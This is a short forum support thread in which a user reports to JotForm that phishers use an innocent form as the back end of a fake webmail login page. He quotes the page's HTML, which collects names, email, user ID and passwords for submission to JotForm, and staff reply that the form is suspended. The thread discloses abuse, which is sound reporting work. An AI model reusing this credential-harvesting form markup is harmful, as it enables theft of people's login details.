Detection-evading phishing from JotForm

  • Profile Image
    Raul Landa
    Asked on February 05, 2012 at 07:19 AM

    Hello,

     

    Just to let you know of a slimy new tactic by phishers. The idea now is to have an innocent-looking form, like this:

     

    http://www.jotform.com/form/20352840566

     

    and then use it as a back-end for an obvious phishing attck, such as this:

     

    http://openwebmail.instantfreesite.com/openwebmail.htm

     

    If you see the source code of this last phishing page, you will see that it is nothing but a view to your own form, with the suspicious fields renamed:

     

    <form class="jotform-form" action="http://submit.jotform.com/submit.php" method="post" name="form_20352840566" id="20352840566" accept-charset="utf-8">
      <input type="hidden" name="formID" value="20352840566" />
      <br>
      <table align="center" border="0" cellspacing="2" cellpadding="0">
      <tr>
      <td align="right" nowrap>First Name: </td>
      <td><input type="text" name="q8_fullName8[first]" size="14" id="first_8" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Last Name: </td>
      <td><input type="text" name="q8_fullName8[last]" size="14" id="last_8" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Email: </td>
      <td><input type="email" name="q3_email3" class="form-textbox validate[Email]" id="input_3" size="20" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Domain: </td>
      <td><input type="text" name="q4_dom" size="14" id="input_4" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>UserID: </td>
      <td><input type="text" name="input_4" size="14" id="input_5" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Password: </td>
      <td><input type="password" name="q6_info" size="14" id="input_6" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Re:Password: </td>
      <td><input type="password" name="q7_cinfo" size="14" id="input_7" onchange="focusloginbutton()" /></td>

     


     

     


     

  • Profile Image
    mliz
    Answered on February 05, 2012 at 07:25 AM

    Thank you for bringing this to our attention, the form has already been suspended.

    Cheers!